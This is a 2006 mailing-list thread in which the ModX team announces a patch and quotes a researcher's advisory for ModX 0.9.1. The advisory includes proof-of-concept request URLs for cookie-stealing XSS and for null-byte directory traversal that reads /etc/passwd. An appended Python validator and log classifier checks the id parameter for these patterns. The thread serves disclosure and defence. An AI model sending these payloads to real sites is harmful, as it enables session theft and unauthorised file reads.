The ModX development team released a patch for these bugs this morning.
More information available at:
http://modxcms.com/forums/index.php/topic,3982.0.html

While we greatly appreciate the efforts of cR45H3R in finding these
bugs in our code, we'd also appreciate a courtesy email to the dev
team before vulnerabilities like these are made public.

Victor
(on behalf of the ModX dev team)

On Apr 14, 2006, at 1:53 AM, crasher@kecoak.or.id wrote:

>
>
> ]=- Vulnerabilities in ModX
>
> Author : Rusydi Hasan M
> a.k.a : cR45H3R
> Date : April 13th, 2006
> Location : Indonesia, Cilacap
>
>
> ]=- Software description
>
> Version : 0.9.1
> URL : http://modxcms.com
>
>
> ]=- the bugs
>
> 1. XSS || [C]ross [S]ite [S]cripting
> 2. Reverse Directory Traversal with NULL injection
>
>
> ]=- PoC
>
> [1] XSS
>
> http://[victim]/[modx_dir]/index.php?id=[parameter][XSS_here]
>
> E[x]ample :
>
> http://127.0.0.1/modx/index.php?id=2%3Cscript%3Ealert(document.cookie)%3C/script%3E
>
> [2] Reverse directory Traversal + NULL injection
>
> http://[victim]/[modx_dir]/index.php?id=[parameter][reverse_directory]%00
>
> E[x]ample :
>
> http://127.0.0.1/modx/index.php?id=1.../../../../etc/passwd%00
>
> PHP error debug
> Error:
>
> fopen(/var/www/html/modx/assets/cache/docid_1/../../../../../../../etc/passwd\0.pageCache.php): failed to open stream: Permission denied
>
>
> ]=- Vendor
>
> Not contacted
>
>
> ]=- Shoutz
>
> # fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,degleng,etc
> # y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous, the day
> # ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,sakitjiwa,m_beben
>
>
> ]=- Contact
>
> crasher@kecoak.or.id || http://kecoak.or.id
>
>
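
Added example, not part of the original thread and not the ModX patch: both PoCs in the advisory abuse the same `id` parameter, so a strict integer check closes both, and the same rule can triage access logs. The integer-only id format, the function names, and the `docid_<id>.pageCache.php` naming (inferred from the quoted `fopen()` error) are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: a document id is a plain decimal integer (as in id=1, id=2 above).
VALID_ID = re.compile(r"[0-9]{1,10}")
CACHE_DIR = "/var/www/html/modx/assets/cache"  # directory seen in the fopen() error


def parse_doc_id(raw):
    """Return the id as an int, or None. Reject bad input instead of cleaning it."""
    return int(raw) if VALID_ID.fullmatch(raw) else None


def cache_file(raw_id):
    """Build the page-cache path from the validated integer only."""
    doc_id = parse_doc_id(raw_id)
    if doc_id is None:
        raise ValueError("id must be a decimal integer")
    return f"{CACHE_DIR}/docid_{doc_id}.pageCache.php"


def classify_request(url):
    """Return (doc_id, reasons) for a logged request URL; reasons is empty if clean."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get("id", [])
    if len(values) != 1:
        return None, ["missing-or-repeated-id"]
    raw = values[0]  # parse_qs has already percent-decoded the value
    reasons = []
    if "\x00" in raw:
        reasons.append("null-byte")
    if "../" in raw or "..\\" in raw:
        reasons.append("path-traversal")
    if "<" in raw or ">" in raw:
        reasons.append("markup")
    doc_id = parse_doc_id(raw)
    if doc_id is None and not reasons:
        reasons.append("non-numeric")
    return doc_id, reasons


# The two request URLs from the advisory plus one constructed benign request.
SAMPLES = [
    "http://127.0.0.1/modx/index.php?id=2",
    "http://127.0.0.1/modx/index.php?id=2%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "http://127.0.0.1/modx/index.php?id=1.../../../../etc/passwd%00",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(classify_request(url), url)
```

Because the id is rejected unless it is all digits, nothing attacker-controlled reaches the cache path or the rendered page; the reason tags are only for log triage.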